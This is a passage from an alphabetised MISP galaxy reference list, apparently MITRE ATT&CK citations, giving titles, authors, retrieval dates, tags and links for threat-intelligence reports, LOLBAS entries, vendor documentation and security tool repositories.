Del Fierro, C. Kessem, L.. (2020, January 8). From Mega to Giga: Cross-Version Comparison of Top MegaCortex Modifications. Retrieved February 15, 2021.

The tag is: misp-galaxy:references="IBM MegaCortex"

Table 13693. Table References

Links

https://securityintelligence.com/posts/from-mega-to-giga-cross-version-comparison-of-top-megacortex-modifications/

BiZone Lizar May 2021

BI.ZONE Cyber Threats Research Team. (2021, May 13). From pentest to APT attack: cybercriminal group FIN7 disguises its malware as an ethical hacker’s toolkit. Retrieved February 2, 2022.

The tag is: misp-galaxy:references="BiZone Lizar May 2021"

Table 13694. Table References

Links

https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319

Kaspersky StoneDrill 2017

Kaspersky Lab. (2017, March 7). From Shamoon to StoneDrill: Wipers attacking Saudi organizations and beyond. Retrieved March 14, 2019.

The tag is: misp-galaxy:references="Kaspersky StoneDrill 2017"

Table 13695. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf

FsiAnyCpu.exe - LOLBAS Project

LOLBAS. (2021, September 26). FsiAnyCpu.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="FsiAnyCpu.exe - LOLBAS Project"

Table 13696. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/

Fsi.exe - LOLBAS Project

LOLBAS. (2021, September 26). Fsi.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Fsi.exe - LOLBAS Project"

Table 13697. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/

fsutil_behavior

Microsoft. (2021, September 27). fsutil behavior. Retrieved January 14, 2022.

The tag is: misp-galaxy:references="fsutil_behavior"

Table 13698. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-behavior

Fsutil.exe - LOLBAS Project

LOLBAS. (2021, August 16). Fsutil.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Fsutil.exe - LOLBAS Project"

Table 13699. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Fsutil/

Microsoft FTP

Microsoft. (2021, July 21). ftp. Retrieved February 25, 2022.

The tag is: misp-galaxy:references="Microsoft FTP"

Table 13700. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/ftp

Linux FTP

N/A. (n.d.). ftp(1) - Linux man page. Retrieved February 25, 2022.

The tag is: misp-galaxy:references="Linux FTP"

Table 13701. Table References

Links

https://linux.die.net/man/1/ftp

Ftp.exe - LOLBAS Project

LOLBAS. (2018, December 10). Ftp.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Ftp.exe - LOLBAS Project"

Table 13702. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Ftp/

Microsoft WMI Filters

Microsoft. (2008, September 11). Fun with WMI Filters in Group Policy. Retrieved March 13, 2019.

The tag is: misp-galaxy:references="Microsoft WMI Filters"

Table 13703. Table References

Links

https://blogs.technet.microsoft.com/askds/2008/09/11/fun-with-wmi-filters-in-group-policy/

Cybersecurity Advisory SVR TTP May 2021

NCSC, CISA, FBI, NSA. (2021, May 7). Further TTPs associated with SVR cyber actors. Retrieved July 29, 2021.

The tag is: misp-galaxy:references="Cybersecurity Advisory SVR TTP May 2021"

Table 13704. Table References

Links

https://www.ncsc.gov.uk/files/Advisory-further-TTPs-associated-with-SVR-cyber-actors.pdf

RiskIQ Cobalt Nov 2017

Klijnsma, Y.. (2017, November 28). Gaffe Reveals Full List of Targets in Spear Phishing Attack Using Cobalt Strike Against Financial Institutions. Retrieved October 10, 2018.

The tag is: misp-galaxy:references="RiskIQ Cobalt Nov 2017"

Table 13705. Table References

Links

https://web.archive.org/web/20190508170630/https://www.riskiq.com/blog/labs/cobalt-strike/

Unit 42 PingPull Jun 2022

Unit 42. (2022, June 13). GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool. Retrieved August 7, 2022.

The tag is: misp-galaxy:references="Unit 42 PingPull Jun 2022"

Table 13706. Table References

Links

https://unit42.paloaltonetworks.com/pingpull-gallium/

Microsoft GALLIUM December 2019

MSTIC. (2019, December 12). GALLIUM: Targeting global telecom. Retrieved January 13, 2021.

The tag is: misp-galaxy:references="Microsoft GALLIUM December 2019"

Table 13707. Table References

Links

https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

Symantec Gallmaker Oct 2018

Symantec Security Response. (2018, October 10). Gallmaker: New Attack Group Eschews Malware to Live off the Land. Retrieved November 27, 2018.

The tag is: misp-galaxy:references="Symantec Gallmaker Oct 2018"

Table 13708. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group

TrendMicro Gamaredon April 2020

Kakara, H., Maruyama, E. (2020, April 17). Gamaredon APT Group Use Covid-19 Lure in Campaigns. Retrieved May 19, 2020.

The tag is: misp-galaxy:references="TrendMicro Gamaredon April 2020"

Table 13709. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/gamaredon-apt-group-use-covid-19-lure-in-campaigns/

ESET Gamaredon June 2020

Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020.

The tag is: misp-galaxy:references="ESET Gamaredon June 2020"

Table 13710. Table References

Links

https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/

CERT-EE Gamaredon January 2021

CERT-EE. (2021, January 27). Gamaredon Infection: From Dropper to Entry. Retrieved February 17, 2022.

The tag is: misp-galaxy:references="CERT-EE Gamaredon January 2021"

Table 13711. Table References

Links

https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf

Kaspersky Winnti June 2015

Tarakanov, D. (2015, June 22). Games are over: Winnti is now targeting pharmaceutical companies. Retrieved January 14, 2016.

The tag is: misp-galaxy:references="Kaspersky Winnti June 2015"

Table 13712. Table References

Links

https://securelist.com/games-are-over/70991/

WeLiveSecurity Gapz and Redyms Mar 2013

Matrosov, A. (2013, March 19). Gapz and Redyms droppers based on Power Loader code. Retrieved December 16, 2017.

The tag is: misp-galaxy:references="WeLiveSecurity Gapz and Redyms Mar 2013"

Table 13713. Table References

Links

https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/

theevilbit gatekeeper bypass 2021

Csaba Fitzl. (2021, June 29). GateKeeper - Not a Bypass (Again). Retrieved September 22, 2021.

The tag is: misp-galaxy:references="theevilbit gatekeeper bypass 2021"

Table 13714. Table References

Links

https://theevilbit.github.io/posts/gatekeeper_not_a_bypass/

Kaspersky Gauss Whitepaper

Kaspersky Lab. (2012, August). Gauss: Abnormal Distribution. Retrieved January 17, 2019.

The tag is: misp-galaxy:references="Kaspersky Gauss Whitepaper"

Table 13715. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134940/kaspersky-lab-gauss.pdf

Kaspersky MoleRATs April 2019

GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020.

The tag is: misp-galaxy:references="Kaspersky MoleRATs April 2019"

Table 13716. Table References

Links

https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/

ESET Gazer Aug 2017

ESET. (2017, August). Gazing at Gazer: Turla’s new second stage backdoor. Retrieved September 14, 2017.

The tag is: misp-galaxy:references="ESET Gazer Aug 2017"

Table 13717. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf

file_sig_table

Kessler, G. (2022, December 9). GCK’S FILE SIGNATURES TABLE. Retrieved August 23, 2022.

The tag is: misp-galaxy:references="file_sig_table"

Table 13718. Table References

Links

https://www.garykessler.net/library/file_sigs.html

Google Cloud Add Metadata

Google Cloud. (2022, March 31). gcloud compute instances add-metadata. Retrieved April 1, 2022.

The tag is: misp-galaxy:references="Google Cloud Add Metadata"

Table 13719. Table References

Links

https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata

Google Compute Instances

Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020.

The tag is: misp-galaxy:references="Google Compute Instances"

Table 13720. Table References

Links

https://cloud.google.com/sdk/gcloud/reference/compute/instances/list

GCP SSH Key Add

Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved October 1, 2020.

The tag is: misp-galaxy:references="GCP SSH Key Add"

Table 13721. Table References

Links

https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add

Google Cloud - IAM Servie Accounts List API

Google. (2020, June 23). gcloud iam service-accounts list. Retrieved August 4, 2020.

The tag is: misp-galaxy:references="Google Cloud - IAM Servie Accounts List API"

Table 13722. Table References

Links

https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list

ESET Gelsemium June 2021

Dupuy, T. and Faou, M. (2021, June). Gelsemium. Retrieved November 30, 2021.

The tag is: misp-galaxy:references="ESET Gelsemium June 2021"

Table 13723. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf

TechNet Scheduled Task Events

Microsoft. (n.d.). General Task Registration. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="TechNet Scheduled Task Events"

Table 13724. Table References

Links

https://technet.microsoft.com/library/dd315590.aspx

Ebowla: Genetic Malware

Morrow, T., Pitts, J. (2016, October 28). Genetic Malware: Designing Payloads for Specific Targets. Retrieved January 18, 2019.

The tag is: misp-galaxy:references="Ebowla: Genetic Malware"

Table 13725. Table References

Links

https://github.com/Genetic-Malware/Ebowla/blob/master/Eko_2016_Morrow_Pitts_Master.pdf

Proofpoint NETWIRE December 2020

Proofpoint. (2020, December 2). Geofenced NetWire Campaigns. Retrieved January 7, 2021.

The tag is: misp-galaxy:references="Proofpoint NETWIRE December 2020"

Table 13726. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/geofenced-netwire-campaigns

Hartrell cd00r 2002

Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.

The tag is: misp-galaxy:references="Hartrell cd00r 2002"

Table 13727. Table References

Links

https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631

Kubectl Exec Get Shell

The Kubernetes Authors. (n.d.). Get a Shell to a Running Container. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Kubectl Exec Get Shell"

Table 13728. Table References

Links

https://kubernetes.io/docs/tasks/debug-application-cluster/get-shell-running-container/

Microsoft getglobaladdresslist

Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="Microsoft getglobaladdresslist"

Table 13729. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist

Jay GetHooks Sept 2011

Satiro, J. (2011, September 14). GetHooks. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="Jay GetHooks Sept 2011"

Table 13730. Table References

Links

https://github.com/jay/gethooks

Microsoft Get-InboxRule

Microsoft. (n.d.). Get-InboxRule. Retrieved June 10, 2021.

The tag is: misp-galaxy:references="Microsoft Get-InboxRule"

Table 13731. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/exchange/get-inboxrule?view=exchange-ps

Microsoft Msolrole

Microsoft. (n.d.). Get-MsolRole. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="Microsoft Msolrole"

Table 13732. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0

Microsoft msolrolemember

Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.

The tag is: misp-galaxy:references="Microsoft msolrolemember"

Table 13733. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0

rowland linux at 2019

Craig Rowland. (2019, July 25). Getting an Attacker IP Address from a Malicious Linux At Job. Retrieved October 15, 2021.

The tag is: misp-galaxy:references="rowland linux at 2019"

Table 13734. Table References

Links

https://www.linkedin.com/pulse/getting-attacker-ip-address-from-malicious-linux-job-craig-rowland/

BlackHatRobinSage

Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved March 6, 2017.

The tag is: misp-galaxy:references="BlackHatRobinSage"

Table 13735. Table References

Links

http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf

AADInternals Root Access to Azure VMs

Dr. Nestori Syynimaa. (2020, June 4). Getting root access to Azure VMs as a Azure AD Global Administrator. Retrieved March 13, 2023.

The tag is: misp-galaxy:references="AADInternals Root Access to Azure VMs"

Table 13736. Table References

Links

https://aadinternals.com/post/azurevms/

Wardle Dylib Hijack Vulnerable Apps

Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore Apps. Retrieved March 31, 2021.

The tag is: misp-galaxy:references="Wardle Dylib Hijack Vulnerable Apps"

Table 13737. Table References

Links

https://objective-see.com/blog/blog_0x46.html

MSDN VBA in Office

Austin, J. (2017, June 6). Getting Started with VBA in Office. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="MSDN VBA in Office"

Table 13738. Table References

Links

https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office

Windows Getting Started Drivers

Viviano, A. (2021, August 17). Getting started with Windows drivers: User mode and kernel mode. Retrieved September 24, 2021.

The tag is: misp-galaxy:references="Windows Getting Started Drivers"

Table 13739. Table References

Links

https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode

Bloxham

Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint slides]. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Bloxham"

Table 13740. Table References

Links

https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf

Microsoft GetWindowLong function

Microsoft. (n.d.). GetWindowLong function. Retrieved December 16, 2017.

The tag is: misp-galaxy:references="Microsoft GetWindowLong function"

Table 13741. Table References

Links

https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx

Microsoft GFlags Mar 2017

Microsoft. (2017, May 23). GFlags Overview. Retrieved December 18, 2017.

The tag is: misp-galaxy:references="Microsoft GFlags Mar 2017"

Table 13742. Table References

Links

https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview

GfxDownloadWrapper.exe - LOLBAS Project

LOLBAS. (2019, December 27). GfxDownloadWrapper.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="GfxDownloadWrapper.exe - LOLBAS Project"

Table 13743. Table References

Links

https://lolbas-project.github.io/lolbas/HonorableMentions/GfxDownloadWrapper/

GhostToken GCP flaw

Sergiu Gatlan. (2023, April 21). GhostToken GCP flaw let attackers backdoor Google accounts. Retrieved September 18, 2023.

The tag is: misp-galaxy:references="GhostToken GCP flaw"

Table 13744. Table References

Links

https://www.bleepingcomputer.com/news/security/ghosttoken-gcp-flaw-let-attackers-backdoor-google-accounts/

GitHub Chisel

jpillora. (n.d.). GitHub Chisel. Retrieved October 20, 2023.

The tag is: misp-galaxy:references="GitHub Chisel"

Table 13745. Table References

Links

https://github.com/jpillora/chisel

Github evilginx2

Gretzky, Kuba. (2019, April 10). Retrieved October 8, 2019.

The tag is: misp-galaxy:references="Github evilginx2"

Table 13746. Table References

Links

https://github.com/kgretzky/evilginx2

GitHub evilginx2

kgretzky. (n.d.). GitHub evilginx2. Retrieved December 14, 2023.

The tag is: misp-galaxy:references="GitHub evilginx2"

Table 13747. Table References

Links

https://github.com/kgretzky/evilginx2

GitHub Malleable C2

Mudge, R. (2014, July 14). Github Malleable-C2-Profiles safebrowsing.profile. Retrieved June 18, 2017.

The tag is: misp-galaxy:references="GitHub Malleable C2"

Table 13748. Table References

Links

https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/safebrowsing.profile

GitHub meganz MEGAsync

GitHub. (n.d.). GitHub - meganz/MEGAsync: Easy automated syncing between your computers and your MEGA Cloud Drive. Retrieved June 22, 2023.

The tag is: misp-galaxy:references="GitHub meganz MEGAsync"

Table 13749. Table References

Links

https://github.com/meganz/MEGAsync

code_persistence_zsh

Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js. Retrieved January 11, 2021.

The tag is: misp-galaxy:references="code_persistence_zsh"

Table 13750. Table References

Links

https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js

Github PowerShell Empire

Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.

The tag is: misp-galaxy:references="Github PowerShell Empire"

Table 13751. Table References

Links

https://github.com/PowerShellEmpire/Empire

GitHub Pupy

Nicolas Verdier. (n.d.). Retrieved January 29, 2018.

The tag is: misp-galaxy:references="GitHub Pupy"

Table 13752. Table References

Links

https://github.com/n1nj4sec/pupy

GitHub random_c2_profile

threatexpress. (n.d.). GitHub random_c2_profile. Retrieved September 21, 2023.

The tag is: misp-galaxy:references="GitHub random_c2_profile"

Table 13753. Table References

Links

https://github.com/threatexpress/random_c2_profile

GitHub rsockstun

llkat. (n.d.). GitHub rsockstun. Retrieved December 14, 2023.

The tag is: misp-galaxy:references="GitHub rsockstun"

Table 13754. Table References

Links

https://github.com/llkat/rsockstun

GitHub secretsdump

fortra. (n.d.). GitHub secretsdump. Retrieved November 16, 2023.

The tag is: misp-galaxy:references="GitHub secretsdump"

Table 13755. Table References

Links

https://github.com/fortra/impacket/blob/master/examples/secretsdump.py

GitHub SharpChromium

djhohnstein. (n.d.). GitHub SharpChromium. Retrieved December 14, 2023.

The tag is: misp-galaxy:references="GitHub SharpChromium"

Table 13756. Table References

Links

https://github.com/djhohnstein/SharpChromium

GitHub SharpRoast

GhostPack. (n.d.). GitHub SharpRoast. Retrieved September 22, 2023.

The tag is: misp-galaxy:references="GitHub SharpRoast"

Table 13757. Table References

Links

https://github.com/GhostPack/SharpRoast

GitHub SILENTTRINITY March 2022

Salvati, M (2019, August 6). SILENTTRINITY. Retrieved March 23, 2022.

The tag is: misp-galaxy:references="GitHub SILENTTRINITY March 2022"

Table 13758. Table References

Links

https://github.com/byt3bl33d3r/SILENTTRINITY

GitHub xmrig-proxy

xmrig. (n.d.). GitHub xmrig-proxy. Retrieved October 25, 2023.

The tag is: misp-galaxy:references="GitHub xmrig-proxy"

Table 13759. Table References

Links

https://github.com/xmrig/xmrig-proxy

GitHub Gitrob

Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="GitHub Gitrob"

Table 13760. Table References

Links

https://github.com/michenriksen/gitrob

FireEye DNS Hijack 2019

Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020.

The tag is: misp-galaxy:references="FireEye DNS Hijack 2019"

Table 13761. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html

McAfee Night Dragon

McAfee® Foundstone® Professional Services and McAfee Labs™. (2011, February 10). Global Energy Cyberattacks: “Night Dragon”. Retrieved February 19, 2018.

The tag is: misp-galaxy:references="McAfee Night Dragon"

Table 13762. Table References

Links

https://scadahacker.com/library/Documents/Cyber_Events/McAfee%20-%20Night%20Dragon%20-%20Global%20Energy%20Cyberattacks.pdf

GMER Rootkits

GMER. (n.d.). GMER. Retrieved December 12, 2017.

The tag is: misp-galaxy:references="GMER Rootkits"

Table 13763. Table References

Links

http://www.gmer.net/

Gnome Remote Desktop grd-settings

Pascal Nowack. (n.d.). Retrieved September 21, 2021.

The tag is: misp-galaxy:references="Gnome Remote Desktop grd-settings"

Table 13764. Table References

Links

https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207

Gnome Remote Desktop gschema

Pascal Nowack. (n.d.). Retrieved September 21, 2021.

The tag is: misp-galaxy:references="Gnome Remote Desktop gschema"

Table 13765. Table References

Links

https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in

MITRE Trustworthy Firmware Measurement

Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.

The tag is: misp-galaxy:references="MITRE Trustworthy Firmware Measurement"

Table 13766. Table References

Links

http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research

Secureworks Gold Blackburn Mar 2022

Secureworks Counter Threat Unit. (2022, March 1). Gold Blackburn Threat Profile. Retrieved June 15, 2023.

The tag is: misp-galaxy:references="Secureworks Gold Blackburn Mar 2022"

Table 13767. Table References

Links

https://www.secureworks.com/research/threat-profiles/gold-blackburn

Secureworks GOLD CABIN

Secureworks. (n.d.). GOLD CABIN Threat Profile. Retrieved March 17, 2021.

The tag is: misp-galaxy:references="Secureworks GOLD CABIN"

Table 13768. Table References

Links

https://www.secureworks.com/research/threat-profiles/gold-cabin

McAfee Gold Dragon

Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems. Retrieved June 6, 2018.

The tag is: misp-galaxy:references="McAfee Gold Dragon"

Table 13769. Table References

Links

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/

Cyberark Golden SAML

Reiner, S. (2017, November 21). Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps. Retrieved December 17, 2020.

The tag is: misp-galaxy:references="Cyberark Golden SAML"

Table 13770. Table References

Links

https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

Trustwave GoldenSpy2 June 2020

Trustwave SpiderLabs. (2020, June 26). GoldenSpy: Chapter Two – The Uninstaller. Retrieved July 23, 2020.

The tag is: misp-galaxy:references="Trustwave GoldenSpy2 June 2020"

Table 13771. Table References

Links

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/

Secureworks GOLD KINGSWOOD Threat Profile

Secureworks. (n.d.). GOLD KINGSWOOD. Retrieved October 18, 2021.

The tag is: misp-galaxy:references="Secureworks GOLD KINGSWOOD Threat Profile"

Table 13772. Table References

Links

https://www.secureworks.com/research/threat-profiles/gold-kingswood?filter=item-financial-gain

MSTIC NOBELIUM Mar 2021

Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.

The tag is: misp-galaxy:references="MSTIC NOBELIUM Mar 2021"

Table 13773. Table References

Links

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/

Secureworks GOLD NIAGARA Threat Profile

CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.

The tag is: misp-galaxy:references="Secureworks GOLD NIAGARA Threat Profile"

Table 13774. Table References

Links

https://www.secureworks.com/research/threat-profiles/gold-niagara

Secureworks GOLD SOUTHFIELD

Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.

The tag is: misp-galaxy:references="Secureworks GOLD SOUTHFIELD"

Table 13775. Table References

Links

https://www.secureworks.com/research/threat-profiles/gold-southfield

Google Cloud Identity API Documentation

Google. (n.d.). Retrieved March 16, 2021.

The tag is: misp-galaxy:references="Google Cloud Identity API Documentation"

Table 13776. Table References

Links

https://cloud.google.com/identity/docs/reference/rest

GCPBucketBrute

Spencer Gietzen. (2019, February 26). Google Cloud Platform (GCP) Bucket Enumeration and Privilege Escalation. Retrieved March 4, 2022.

The tag is: misp-galaxy:references="GCPBucketBrute"

Table 13777. Table References

Links

https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/

ExploitDB GoogleHacking

Offensive Security. (n.d.). Google Hacking Database. Retrieved October 23, 2020.

The tag is: misp-galaxy:references="ExploitDB GoogleHacking"

Table 13778. Table References

Links

https://www.exploit-db.com/google-hacking-database

Google Workspace Global Access List

Google. (n.d.). Retrieved March 16, 2021.

The tag is: misp-galaxy:references="Google Workspace Global Access List"

Table 13779. Table References

Links

https://support.google.com/a/answer/166870?hl=en

Sophos Gootloader

Szappanos, G. & Brandt, A. (2021, March 1). “Gootloader” expands its payload delivery options. Retrieved September 30, 2022.

The tag is: misp-galaxy:references="Sophos Gootloader"

Table 13780. Table References

Links

https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/

Unit 42 CARROTBAT January 2020

McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020.

The tag is: misp-galaxy:references="Unit 42 CARROTBAT January 2020"

Table 13781. Table References

Links

https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/

Secureworks BRONZE SILHOUETTE May 2023

Counter Threat Unit Research Team. (2023, May 24). Chinese Cyberespionage Group BRONZE SILHOUETTE Targets U.S. Government and Defense Organizations. Retrieved July 27, 2023.

The tag is: misp-galaxy:references="Secureworks BRONZE SILHOUETTE May 2023"

Table 13782. Table References

Links

https://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-government-and-defense-organizations

FireEye HAWKBALL Jun 2019

Patil, S. and Williams, M.. (2019, June 5). Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities. Retrieved June 20, 2019.

The tag is: misp-galaxy:references="FireEye HAWKBALL Jun 2019"

Table 13783. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html

CISA AA20-296A Berserk Bear December 2020

CISA. (2020, December 1). Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets. Retrieved December 9, 2021.

The tag is: misp-galaxy:references="CISA AA20-296A Berserk Bear December 2020"

Table 13784. Table References

Links

https://www.cisa.gov/uscert/ncas/alerts/aa20-296a#revisions

Obscuresecurity Get-GPPPassword

Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="Obscuresecurity Get-GPPPassword"

Table 13785. Table References

Links

https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html

Microsoft gpresult

Microsoft. (2017, October 16). gpresult. Retrieved August 6, 2021.

The tag is: misp-galaxy:references="Microsoft gpresult"

Table 13786. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult

Gpscript.exe - LOLBAS Project

LOLBAS. (2018, May 25). Gpscript.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Gpscript.exe - LOLBAS Project"

Table 13787. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Gpscript/

ESET Grandoreiro April 2020

ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020.

The tag is: misp-galaxy:references="ESET Grandoreiro April 2020"

Table 13788. Table References

Links

https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/

IBM Grandoreiro April 2020

Abramov, D. (2020, April 13). Grandoreiro Malware Now Targeting Banks in Spain. Retrieved November 12, 2020.

The tag is: misp-galaxy:references="IBM Grandoreiro April 2020"

Table 13789. Table References

Links

https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/

AWS PassRole

AWS. (n.d.). Granting a user permissions to pass a role to an AWS service. Retrieved July 10, 2023.

The tag is: misp-galaxy:references="AWS PassRole"

Table 13790. Table References

Links

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html

CopyFromScreen .NET

Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved March 24, 2020.

The tag is: misp-galaxy:references="CopyFromScreen .NET"

Table 13791. Table References

Links

https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8

Talos GravityRAT

Mercer, W., Rascagneres, P. (2018, April 26). GravityRAT - The Two-Year Evolution Of An APT Targeting India. Retrieved May 16, 2018.

The tag is: misp-galaxy:references="Talos GravityRAT"

Table 13792. Table References

Links

https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html

FireEye PowerShell Logging

Dunwoody, M. (2016, February 11). Greater Visibility Through PowerShell Logging. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="FireEye PowerShell Logging"

Table 13793. Table References

Links

https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html

FireEye PowerShell Logging 2016

Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016.

The tag is: misp-galaxy:references="FireEye PowerShell Logging 2016"

Table 13794. Table References

Links

https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html

Glitch-Cat Green Lambert ATTCK Oct 2021

Sandvik, Runa. (2021, October 18). Green Lambert and ATT&CK. Retrieved March 21, 2022.

The tag is: misp-galaxy:references="Glitch-Cat Green Lambert ATTCK Oct 2021"

Table 13795. Table References

Links

https://www.glitch-cat.com/blog/green-lambert-and-attack

ESET GreyEnergy Oct 2018

Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.

The tag is: misp-galaxy:references="ESET GreyEnergy Oct 2018"

Table 13796. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf

GRIZZLY STEPPE JAR

Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.

The tag is: misp-galaxy:references="GRIZZLY STEPPE JAR"

